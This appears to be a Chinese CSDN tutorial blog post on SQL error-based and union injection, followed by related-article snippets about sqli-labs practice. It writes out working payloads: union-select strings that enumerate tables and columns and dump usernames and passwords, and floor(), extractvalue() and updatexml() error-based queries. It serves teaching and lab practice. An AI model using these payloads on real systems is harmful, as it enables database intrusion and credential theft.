SQL注入-报错注入

最新推荐文章于 2024-06-06 19:11:19 发布
最新推荐文章于 2024-06-06 19:11:19 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/90446367
版权

报错注入原理
根据注入位置数据类型可将SQl注入分为两类:数字型和字符型。
例如:
数字型:select * from table where id=用户id
字符型:select * from table where id=‘用户id’
通过在URL中修改对应的ID值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URl中是否存在注入点。

构造payload让信息通过错误提示回显出来。
应用场景:查询不回显内容,会打印错误信息
update、insert等语句,会打印错误信息

此时可以利用order by判断字段数。

SQL union操作符
union操作符用于合并两个或多个select语句的结果集
注意:union内部的select语句必须拥有相同的数量的列,列也必须拥有相似的数据类型。同时,每条select语句中的列的顺序必须相同。
默认情况下,union操作符选取不同的值。如果允许重复的值,请使用union all.
union注入应用场景:
1、只有最后一个select子语句允许有order by
2、只有最后一个select子语句允许有limit
3、只要union连接的几个查询的字段数一样并且列的数据类型转换没有问题,就可以查询出结果。
4、注入页面有回显。
利用union select 联合查询,获取表名。
0’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
利用union select 联合查询,获取字段名。
0’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ --+
利用union select 联合查询,获取字段值
0’ union select 1,group_concat(username,0x3a,password),3 from users --+

报错注入方法
凡是可以让错误信息显示的函数(语句),都能实现报错注入,例如:
floor() |select count(*) from information_schema.tables
group by concat((select version()),floor(rand(0)*2));
group by 对rand函数进行操作时产生错误
concat: 连接字符串功能
floor: 取float的整数值
rand: 取0-1之间随机浮点数
group by: 根据一个或多个列表结果集进行分组并有排序功能。

extractvalue() extractvalue(1,concat*(0x7e,(select user()),0x7e))
XPATH语法错误产生报错
updatexml() select updatexml(1,concat(0x7e,(select user()),0x7e),1)
XPATH语法错误产生报错。

Mandorr
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入-基于报错的注入
xdjxi的博客
02-18 560
实验目的 熟悉报错功能函数extractvalue()的用法,掌握基于报错SQL注入基本流程 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-1为入口,借助extractvalue()函数,利用基于报错的注入方式获取SQLi-Labs网站用户名和密码 1 访问SQLi-Labs网站 http://(靶机ip)/sql/Less-1/?id=1 2 寻找注入点 使用3条payload寻找注入点及判断注入点的类型 http://靶机ip/sql/Less-1/?id=1'运..
SQL注入报错注入
热门推荐
4ct10n
10-07 1万+
做了一些报错注入的题目,总结了一下。原理很简单,只要理解了就能熟练的应用。大体上分了两类出来,一个是利用xml报错,另一个是正常数据库报错。两类的原理不同。
SQL注入手册-报错注入的攻击实例
jdk12123的博客
09-01 53
sql报错注入
[SQL注入] 报错注入
weixin_43586169的博客
05-07 1635
详细描述了SQL注入的四大基本手法中的报错注入的使用
Sql注入-报错注入
最新发布
WolvenSec的博客
06-06 922
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
SQL注入03】报错注入实例操作
Fighting_hawk的博客
02-18 3517
1. SQL注入优先级:union注入>报错注入>布尔盲注>延迟注入; 2. 了解报错注入常用的几个命令; 3. 掌握使用updataxml()函数进行报错注入; 4. updataxml()对仅能获取返回32位字符,对于长字符串需要分批次获取。...
【渗透测试实战】用渗透实例sqllibs第46关来讲解SQL报错注入的操作顺序
祺祺祺有此理的博客
03-18 449
【渗透测试实战】用渗透实例sqllibs第46关来讲解SQL报错注入的操作顺序
SQL 报错注入详解
2301_78008478的博客
05-08 903
近期学习 SQL 报错注入,本篇文章为关于报错注入的一些个人理解,如有错误,希望指出 本文使用 sqli-labs 数据库作为示例报错注入方式有很多,其中比较常见的有 floor() 、extractvalue() 、updatexml() 三种,本篇文章主要对这三种进行分析先贴上一个常见的 payload 再进行分析 (sqli-labs Less-5) 复制首先这个 payload 和网上很多的不太一样,查阅网上相关博客时发现大多数的 payload 都是这样写的 复制这个就是把发生报错的 se
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。...同时,使用预编译语句参数化查询可以显著降低SQL注入的风险。
第四节 基于报错SQL注入-01
09-15
基于报错SQL注入 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于报错SQL注入,包括其分类、发现和利用方法。 SQL注入...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 报错注入 1.3 源码审计
32-32.渗透测试SQL注入基于报错注入(上)
05-10
32-32.渗透测试SQL注入基于报错注入(上)
SQL报错注入原理与实战利用讲解
chen_zhangkonzhe的博客
09-13 1454
MySQL有很多函数支持报错:updatexml() ,floor(), extractvalue() linestring() multipolygon() poolygon() multion()等。但是虽然采用了updatexml报错函数但是该函数只能显示32长度的内容,如果获取的内长度超过32则不会显示,然而这时候就需要使用字符串截取方法了,每次能够获取32个字符串的长度。首先需要获取当前数据库,通过数据库获取表名,接着通过表名获取字段,最后获取字段的数据内容。获取到表名就可以接着获取字段了。
sql注入基础原理及注入方式
A906003660的博客
07-20 1180
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
最详细的SQL注入报错注入
qq_62539372的博客
06-23 1万+
最详细的sql注入报错注入,非常适合小白!!
sql 报错注入
travelnight的博客
03-15 4072
以往个人知识星球搬运 by travelnight 这里以sql-libs为例。 一、基础报错注入 这里的东西比较简单,快速略过。 访问:http://127.0.0.1/sqllabs/Less-1/ 直接构造id参数 http://127.0.0.1/sqllabs/Less-1/?id=1 直接加 ‘触发报错 直接闭合‘ 标签发现正常,说明存在报错注入。 http://127.0.0.1/sqllabs/Less-1/...
sql注入报错注入(精简详细)
qq_56438857的博客
08-02 2078
一直对sql注入报错注入没有系统的整理过,今天整理一遍,方便以后查阅。下面的语句可以直接在sql-lab中实践。
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句执行失败。 2. 数据库对updatexml函数的支持不完整,某些版本的数据库可能不支持某些参数或功能,导致SQL语句执行失败。 3. 输入的注入payload不正确,可能造成语法错误或类型不匹配等问题,导致SQL语句执行失败。 为了解决这个问题,你可以尝试以下方法: 1. 检查SQL语句中updatexml函数的使用是否正确,确保参数数量和类型正确。 2. 检查数据库版本和配置,确保数据库对updatexml函数的支持完整。 3. 检查输入的注入payload是否正确,可以使用工具或手动构造payload进行测试,找出问题所在。 此外,为了避免SQL注入等安全漏洞,建议在编写代码时使用参数化查询,或对输入进行严格的过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值